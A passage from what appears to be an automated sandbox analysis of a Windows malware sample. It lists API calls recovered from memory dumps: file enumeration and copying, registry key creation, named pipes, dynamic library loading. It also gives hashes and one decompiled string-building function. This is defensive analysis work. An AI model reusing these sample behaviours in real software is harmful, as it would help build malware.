                                • Part of subcall function 053CFD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 053CFDD7
                                • Part of subcall function 053CFD22: GetLastError.KERNEL32 ref: 053CFDE1
                                • Part of subcall function 053CFD22: HeapFree.KERNEL32(00000000,00000000), ref: 053CFE04
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 053D69AB
                              • wsprintfA.USER32 ref: 053D69C6
                              • lstrlen.KERNEL32(00000000,00000000), ref: 053D69D1
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 053D69E8
                              • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001), ref: 053D6A0A
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 053D6A5E
                              • HeapFree.KERNEL32(00000000,?), ref: 053D6A8A
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                              • String ID:
                              • API String ID: 3130754786-0
                              • Opcode ID: 0dbbbe8840a3020dae2cdf26062c552561dfdeec13775323a9b50bd969c839c2
                              • Instruction ID: 0c315167840df2fadbb3e02d82c24e4b96ea41c17c3a46698044a072797d1e89
                              • Opcode Fuzzy Hash: 0dbbbe8840a3020dae2cdf26062c552561dfdeec13775323a9b50bd969c839c2
                              • Instruction Fuzzy Hash: 57B12BB6910209EFDB21DF94EC8ADAEBFBDFB08304F104469F516AA250DB715E41CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?), ref: 053CF616
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 053DF68B
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?,?,00000000), ref: 053DF697
                                • Part of subcall function 053DF63F: memset.NTDLL ref: 053DF6DF
                                • Part of subcall function 053DF63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF6FA
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(0000002C), ref: 053DF732
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?), ref: 053DF73A
                                • Part of subcall function 053DF63F: memset.NTDLL ref: 053DF75D
                                • Part of subcall function 053DF63F: wcscpy.NTDLL ref: 053DF76F
                                • Part of subcall function 053DF63F: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 053DF795
                                • Part of subcall function 053DF63F: RtlEnterCriticalSection.NTDLL(?), ref: 053DF7CA
                                • Part of subcall function 053DF63F: RtlLeaveCriticalSection.NTDLL(?), ref: 053DF7E6
                                • Part of subcall function 053DF63F: FindNextFileW.KERNEL32(?,00000000), ref: 053DF7FF
                                • Part of subcall function 053DF63F: WaitForSingleObject.KERNEL32(00000000), ref: 053DF811
                                • Part of subcall function 053DF63F: FindClose.KERNEL32(?), ref: 053DF826
                                • Part of subcall function 053DF63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF83A
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(0000002C), ref: 053DF85C
                              • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 053CF672
                              • memcpy.NTDLL(00000000,?,00000000), ref: 053CF685
                              • lstrcpyW.KERNEL32(00000000,?), ref: 053CF69C
                                • Part of subcall function 053DF63F: FindNextFileW.KERNEL32(?,00000000), ref: 053DF8D2
                                • Part of subcall function 053DF63F: WaitForSingleObject.KERNEL32(00000000), ref: 053DF8E4
                                • Part of subcall function 053DF63F: FindClose.KERNEL32(?), ref: 053DF8FF
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 053CF6C7
                              • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 053CF6DF
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053CF739
                              • lstrlenW.KERNEL32(00000000,?), ref: 053CF75C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053CF76E
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 053CF7E2
                              • HeapFree.KERNEL32(00000000,?), ref: 053CF7F2
                                • Part of subcall function 053D34A4: lstrlen.KERNEL32(053CEFEF,747DF560,00000000,?,00000000,053DBF21,?,00000000,?,?,053CEFEF,00000020), ref: 053D34B3
                                • Part of subcall function 053D34A4: mbstowcs.NTDLL ref: 053D34CF
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 053CF81B
                              • lstrlenW.KERNEL32(053F17D4,?), ref: 053CF895
                              • DeleteFileW.KERNEL32(?,?), ref: 053CF8C3
                              • HeapFree.KERNEL32(00000000,?), ref: 053CF8D1
                              • HeapFree.KERNEL32(00000000,?), ref: 053CF8F2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                              • String ID:
                              • API String ID: 72361108-0
                              • Opcode ID: 935e277c6322f33d1cfc845dc53253151df1f3008003767304fc86943ecc1549
                              • Instruction ID: fc83ffe4992f1e9de89ad498f3d53362efd8e07367bf8c77adc6da07cf7be3e1
                              • Opcode Fuzzy Hash: 935e277c6322f33d1cfc845dc53253151df1f3008003767304fc86943ecc1549
                              • Instruction Fuzzy Hash: 429128B251021ABFCB11DBA4EC8DCAA7FBDFB08354F044455F50ADB151EA70A945CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • memset.NTDLL ref: 053C2E99
                              • StrChrA.SHLWAPI(?,0000000D), ref: 053C2EDF
                              • StrChrA.SHLWAPI(?,0000000A), ref: 053C2EEC
                              • StrChrA.SHLWAPI(?,0000007C), ref: 053C2F13
                              • StrTrimA.SHLWAPI(?,053EC49C), ref: 053C2F28
                              • StrChrA.SHLWAPI(?,0000003D), ref: 053C2F31
                              • StrTrimA.SHLWAPI(00000001,053EC49C), ref: 053C2F47
                              • _strupr.NTDLL ref: 053C2F4E
                              • StrTrimA.SHLWAPI(?,?), ref: 053C2F5B
                              • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 053C2FA3
                              • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,00000001), ref: 053C2FC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                              • String ID: $;
                              • API String ID: 4019332941-73438061
                              • Opcode ID: 2d275a8ad694508583a5df602e060c17709e5e81ad9f68ad5336bac28bedffcb
                              • Instruction ID: 0762523882777a656098e4955b84e38891932fa79976fb075615701a5515d776
                              • Opcode Fuzzy Hash: 2d275a8ad694508583a5df602e060c17709e5e81ad9f68ad5336bac28bedffcb
                              • Instruction Fuzzy Hash: BB41907660834A9FD721DF289C45B2BBFE8BF45600F04085DF996DB281DBB4E9058B72
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(?,0000002C), ref: 053E3FE2
                              • StrTrimA.SHLWAPI(00000001,?), ref: 053E3FFB
                              • StrChrA.SHLWAPI(?,0000002C), ref: 053E4006
                              • StrTrimA.SHLWAPI(00000001,?), ref: 053E401F
                              • lstrlen.KERNEL32(?), ref: 053E40B7
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E40D9
                              • lstrcpy.KERNEL32(00000020,?), ref: 053E40F8
                              • lstrlen.KERNEL32(?), ref: 053E4102
                              • memcpy.NTDLL(?,?,?), ref: 053E4143
                              • memcpy.NTDLL(?,?,?), ref: 053E4156
                              • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 053E417A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053E4199
                              • HeapFree.KERNEL32(00000000,?), ref: 053E41BF
                              • HeapFree.KERNEL32(00000000,?), ref: 053E41DB
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                              • String ID:
                              • API String ID: 3323474148-0
                              • Opcode ID: 35f06aea79550ebfd99054aa641c1cb16e5df02d61d5649f746bfd8af1cd834c
                              • Instruction ID: a76e2fa2d911c1b41a7fbdb49974b55b3092841e1920120099e975dae7da4ac6
                              • Opcode Fuzzy Hash: 35f06aea79550ebfd99054aa641c1cb16e5df02d61d5649f746bfd8af1cd834c
                              • Instruction Fuzzy Hash: 90716C72508315AFDB22DF28DC49A5BBBE9FF48304F04092DF586D6290D771E944CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,?,00000000), ref: 053E1D9D
                              • lstrlen.KERNEL32(?,?,00000000), ref: 053E1DA4
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E1DBB
                              • lstrcpy.KERNEL32(00000000,?), ref: 053E1DCC
                              • lstrcat.KERNEL32(?,?), ref: 053E1DE8
                              • lstrcat.KERNEL32(?,?), ref: 053E1DF9
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E1E0A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E1EA7
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 053E1EE0
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 053E1EF9
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 053E1F03
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 053E1F13
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 053E1F2C
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 053E1F3C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                              • String ID:
                              • API String ID: 333890978-0
                              • Opcode ID: 41b6e27b9c8450e26bedb662aa048c8846f735102a6c0d4a524f3a5dff017c05
                              • Instruction ID: e2961c262c26a46e8c56a93b9dc2c57881faf7ba2a368588585eaedb64379ca7
                              • Opcode Fuzzy Hash: 41b6e27b9c8450e26bedb662aa048c8846f735102a6c0d4a524f3a5dff017c05
                              • Instruction Fuzzy Hash: 33517BB6410119BFCB129FA4DC89CAE7FBDFB48344B154025F6069B190DB719E06CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,00000000,?,?,?,053C5A61,?,?), ref: 053D3FF3
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,053C5A61,?,?), ref: 053D401C
                              • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 053D403C
                              • lstrcpyW.KERNEL32(-00000002,?), ref: 053D4057
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,053C5A61,?,?), ref: 053D4063
                              • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,053C5A61,?,?), ref: 053D4066
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,053C5A61,?,?), ref: 053D4072
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D408F
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D40A9
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D40BF
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D40D5
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D40EB
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053D4101
                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,053C5A61,?,?), ref: 053D412A
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                              • String ID:
                              • API String ID: 3772355505-0
                              • Opcode ID: e72e562ae805a4caa5c2762578dfece47994c989ee91cd62611c2a9e41c917e8
                              • Instruction ID: 4057c2461ce90420c0361a73d4c753bbca71485882e40b56abf3ddad240c9461
                              • Opcode Fuzzy Hash: e72e562ae805a4caa5c2762578dfece47994c989ee91cd62611c2a9e41c917e8
                              • Instruction Fuzzy Hash: 43315D7151421AEFDB10DF64EC8AE6ABFECFF14344B040526B809CB151EBB5E9048BB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C95DC
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C95E7
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C95EF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053C9604
                              • lstrcpyW.KERNEL32(00000000,?), ref: 053C9615
                              • lstrcatW.KERNEL32(00000000,?), ref: 053C9627
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C962C
                              • lstrcatW.KERNEL32(00000000,053EA3F0), ref: 053C9638
                              • lstrcatW.KERNEL32(00000000), ref: 053C9640
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C9645
                              • lstrcatW.KERNEL32(00000000,053EA3F0), ref: 053C9651
                              • lstrcatW.KERNEL32(00000000,00000002), ref: 053C966C
                              • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C9674
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,053CF8BF,?,?,?), ref: 053C9682
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                              • String ID:
                              • API String ID: 3635185113-0
                              • Opcode ID: f3d325f420a2b550dc54e78c3fa5519058c0a7fbd488aa224a4a3737cde2b71f
                              • Instruction ID: 2cb06c349c2f0ab081f7a0d96630f3fb26f17005a0e374cf248b24eccfc9e073
                              • Opcode Fuzzy Hash: f3d325f420a2b550dc54e78c3fa5519058c0a7fbd488aa224a4a3737cde2b71f
                              • Instruction Fuzzy Hash: 5C218B32110215ABC3326B649C8AF6BBFECFF85B55F02041DF5029A190DFA5AC159B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,74785520,?,00000000,?,?,?), ref: 053DBDAA
                              • lstrlen.KERNEL32(?), ref: 053DBDB2
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 053DBDC2
                              • lstrcpy.KERNEL32(00000000,?), ref: 053DBDE1
                              • lstrlen.KERNEL32(?), ref: 053DBDF6
                              • lstrlen.KERNEL32(?), ref: 053DBE04
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 053DBE52
                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 053DBE76
                              • lstrlen.KERNEL32(?), ref: 053DBEA9
                              • HeapFree.KERNEL32(00000000,?,?), ref: 053DBED4
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 053DBEEB
                              • HeapFree.KERNEL32(00000000,?,?), ref: 053DBEF8
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                              • String ID:
                              • API String ID: 904523553-0
                              • Opcode ID: 81be1304b816ba556b446725391380650750c0face53c4dc441b34fe93b6ad2c
                              • Instruction ID: 0dee6627996d5c8ce514af9b419efbf9c5d43dc781b350e1883bece6e14fcdca
                              • Opcode Fuzzy Hash: 81be1304b816ba556b446725391380650750c0face53c4dc441b34fe93b6ad2c
                              • Instruction Fuzzy Hash: 8D415B7290024AEBCF229F64EC58AAEBFBAFF44310F114465F9159B250DB71E951CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 053E2F3F
                              • GetCurrentThreadId.KERNEL32 ref: 053E2F55
                              • GetCurrentThread.KERNEL32 ref: 053E2F66
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                                • Part of subcall function 053CC585: lstrlen.KERNEL32(00000000,00000001,00000000,?,00000000,00000001,00000000,00000000,74785520,00000000,?,053E2FAF,00000020,00000000,?,00000000), ref: 053CC5F0
                                • Part of subcall function 053CC585: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000001,00000000,00000000,74785520,00000000,?,053E2FAF,00000020,00000000,?,00000000), ref: 053CC618
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000020,00000000,?,00000000,?,00000000,053C43B5), ref: 053E2FDF
                              • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053E2FEB
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 053E303A
                              • wsprintfA.USER32 ref: 053E3052
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,053C43B5,00000000), ref: 053E305D
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,053C43B5,00000000), ref: 053E3074
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                              • String ID: W
                              • API String ID: 630447368-655174618
                              • Opcode ID: 3ef9c4a62cb4e0c201a6c8fde1a2a5c2553361e0acf4bb9255ec41b09e66b5e6
                              • Instruction ID: 8aa5767856414c1681fc44594b07cb33ff2036cd260ea9d346c5f503879da913
                              • Opcode Fuzzy Hash: 3ef9c4a62cb4e0c201a6c8fde1a2a5c2553361e0acf4bb9255ec41b09e66b5e6
                              • Instruction Fuzzy Hash: 20417B75904129BBCF229FA5DC4CDAE7FBDFF48344F004426F8069A290DB719A50DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 55%
                              			E049D5D44(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				char _v20;
                              				WCHAR* _v24;
                              				signed int _v28;
                              				intOrPtr _v32;
                              				void* __edi;
                              				void* __esi;
                              				WCHAR* _t58;
                              				signed int _t60;
                              				signed int _t62;
                              				intOrPtr _t64;
                              				intOrPtr _t66;
                              				intOrPtr _t70;
                              				void* _t72;
                              				void* _t75;
                              				void* _t76;
                              				WCHAR* _t80;
                              				WCHAR* _t83;
                              				void* _t84;
                              				void* _t85;
                              				void* _t86;
                              				intOrPtr _t92;
                              				signed int _t103;
                              				void* _t104;
                              				intOrPtr _t105;
                              				void* _t107;
                              				intOrPtr* _t115;
                              				void* _t119;
                              				WCHAR* _t125;
                              
                              				_t58 =  *0x49dd36c; // 0x5819818
                              				_v24 = _t58;
                              				_v28 = 8;
                              				_v20 = GetTickCount();
                              				_t60 = E049D67ED();
                              				_t103 = 5;
                              				_t98 = _t60 % _t103 + 6;
                              				_t62 = E049D67ED();
                              				_t117 = _t62 % _t103 + 6;
                              				_v32 = _t62 % _t103 + 6;
                              				_t64 = E049D3C00(_t60 % _t103 + 6);
                              				_v16 = _t64;
                              				if(_t64 != 0) {
                              					_t66 = E049D3C00(_t117);
                              					_v12 = _t66;
                              					if(_t66 != 0) {
                              						_push(5);
                              						_t104 = 0xa;
                              						_t119 = E049DA725(_t104,  &_v20);
                              						if(_t119 == 0) {
                              							_t119 = 0x49dc1ac;
                              						}
                              						_t70 = E049D4FFE(_v24);
                              						_v8 = _t70;
                              						if(_t70 != 0) {
                              							_t115 = __imp__;
                              							_t72 =  *_t115(_t119);
                              							_t75 =  *_t115(_v8);
                              							_t76 =  *_t115(_a4);
                              							_t80 = E049D55DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                              							_v24 = _t80;
                              							if(_t80 != 0) {
                              								_t105 =  *0x49dd2b8; // 0xe3a5a8
                              								_t28 = _t105 + 0x49deae8; // 0x530025
                              								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                              								_push(4);
                              								_t107 = 5;
                              								_t83 = E049DA725(_t107,  &_v20);
                              								_a8 = _t83;
                              								if(_t83 == 0) {
                              									_a8 = 0x49dc1b0;
                              								}
                              								_t84 =  *_t115(_a8);
                              								_t85 =  *_t115(_v8);
                              								_t86 =  *_t115(_a4);
                              								_t125 = E049D55DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                              								if(_t125 == 0) {
                              									E049D6DFA(_v24);
                              								} else {
                              									_t92 =  *0x49dd2b8; // 0xe3a5a8
                              									_t44 = _t92 + 0x49dec60; // 0x73006d
                              									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                              									 *_a16 = _v24;
                              									_v28 = _v28 & 0x00000000;
                              									 *_a20 = _t125;
                              								}
                              							}
                              							E049D6DFA(_v8);
                              						}
                              						E049D6DFA(_v12);
                              					}
                              					E049D6DFA(_v16);
                              				}
                              				return _v28;
                              			}

                              APIs
                              • GetTickCount.KERNEL32 ref: 049D5D5C
                              • lstrlen.KERNEL32(00000000,00000005), ref: 049D5DDD
                              • lstrlen.KERNEL32(?), ref: 049D5DEE
                              • lstrlen.KERNEL32(00000000), ref: 049D5DF5
                              • lstrlenW.KERNEL32(80000002), ref: 049D5DFC
                              • wsprintfW.USER32 ref: 049D5E42
                              • lstrlen.KERNEL32(?,00000004), ref: 049D5E65
                              • lstrlen.KERNEL32(?), ref: 049D5E6E
                              • lstrlen.KERNEL32(?), ref: 049D5E75
                              • lstrlenW.KERNEL32(?), ref: 049D5E7C
                              • wsprintfW.USER32 ref: 049D5EB3
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrlen$wsprintf$CountFreeHeapTick
                              • String ID:
                              • API String ID: 822878831-0
                              • Opcode ID: eaca67dcdf66fda7ea77a061227bb94de1e1b415446511ac60b83a18c6536864
                              • Instruction ID: c95adcc0062ce378977dd5c1b3a115076645c4e38da0b09bcd77142053b733ad
                              • Opcode Fuzzy Hash: eaca67dcdf66fda7ea77a061227bb94de1e1b415446511ac60b83a18c6536864
                              • Instruction Fuzzy Hash: E5515D32D00219BBDF11AFA4DC44ADE7BB5EF88368F158075E904A7250DB35AE25DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • PathFindFileNameW.SHLWAPI(?), ref: 053D6603
                              • PathFindFileNameW.SHLWAPI(?), ref: 053D6619
                              • lstrlenW.KERNEL32(00000000), ref: 053D665C
                              • RtlAllocateHeap.NTDLL(00000000,053E8A03), ref: 053D6672
                              • memcpy.NTDLL(00000000,00000000,053E8A01), ref: 053D6685
                              • _wcsupr.NTDLL ref: 053D6690
                              • lstrlenW.KERNEL32(?,053E8A01), ref: 053D66C9
                              • RtlAllocateHeap.NTDLL(00000000,?,053E8A01), ref: 053D66DE
                              • lstrcpyW.KERNEL32(00000000,?), ref: 053D66F4
                              • lstrcatW.KERNEL32(00000000,?), ref: 053D6719
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D6728
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                              • String ID:
                              • API String ID: 3868788785-0
                              • Opcode ID: 6588df96736210a86a538cdcc71d31fca81c16431a54849c4d0ad784a4b74632
                              • Instruction ID: 931aef7c71f1e28ed194fa0a90e1ca2bce4d24a2a89c5fe2f52458bdec593a50
                              • Opcode Fuzzy Hash: 6588df96736210a86a538cdcc71d31fca81c16431a54849c4d0ad784a4b74632
                              • Instruction Fuzzy Hash: 0331E433514218ABC7315F64AC8E92BBFFDFB88310F154519FA22DA191DFB6A8048B71
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 053CA4C9
                              • GetTempPathA.KERNEL32(00000000,00000000,?,?,053C42B0,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 053CA4E1
                              • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 053CA4F0
                              • GetTempPathA.KERNEL32(00000001,00000000,?,?,053C42B0,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 053CA503
                              • GetTickCount.KERNEL32 ref: 053CA507
                              • wsprintfA.USER32 ref: 053CA51E
                              • RegCreateKeyA.ADVAPI32(80000001,?,00000000), ref: 053CA559
                              • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 053CA576
                              • lstrlen.KERNEL32(00000000), ref: 053CA580
                              • RegCloseKey.ADVAPI32(?), ref: 053CA59C
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000094,00000000,00000001,00000094,00000000), ref: 053CA5AA
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                              • String ID:
                              • API String ID: 1404517112-0
                              • Opcode ID: 673178794693df5238b4e073a3b82121e1ebbf51c0802293bddc31880702c24c
                              • Instruction ID: 7182b4f628ba75474e22398b3de358c6253a5a1f9424e05215abef4c52e08c6c
                              • Opcode Fuzzy Hash: 673178794693df5238b4e073a3b82121e1ebbf51c0802293bddc31880702c24c
                              • Instruction Fuzzy Hash: E33123B1510209FFDB219FA5EC8DDAB7FADFB44395F008066F906DA150DAB09E01CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(064FBFB0,00000000,00000000,00000000), ref: 053DA5AC
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 053DA5BB
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 053DA5C8
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 053DA5E0
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 053DA5EC
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053DA608
                              • wsprintfA.USER32 ref: 053DA6EA
                              • memcpy.NTDLL(00000000,00004000,?), ref: 053DA737
                              • InterlockedExchange.KERNEL32(053F0184,00000000), ref: 053DA755
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053DA796
                                • Part of subcall function 053CF559: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 053CF582
                                • Part of subcall function 053CF559: memcpy.NTDLL(00000000,?,?), ref: 053CF595
                                • Part of subcall function 053CF559: RtlEnterCriticalSection.NTDLL(053F0488), ref: 053CF5A6
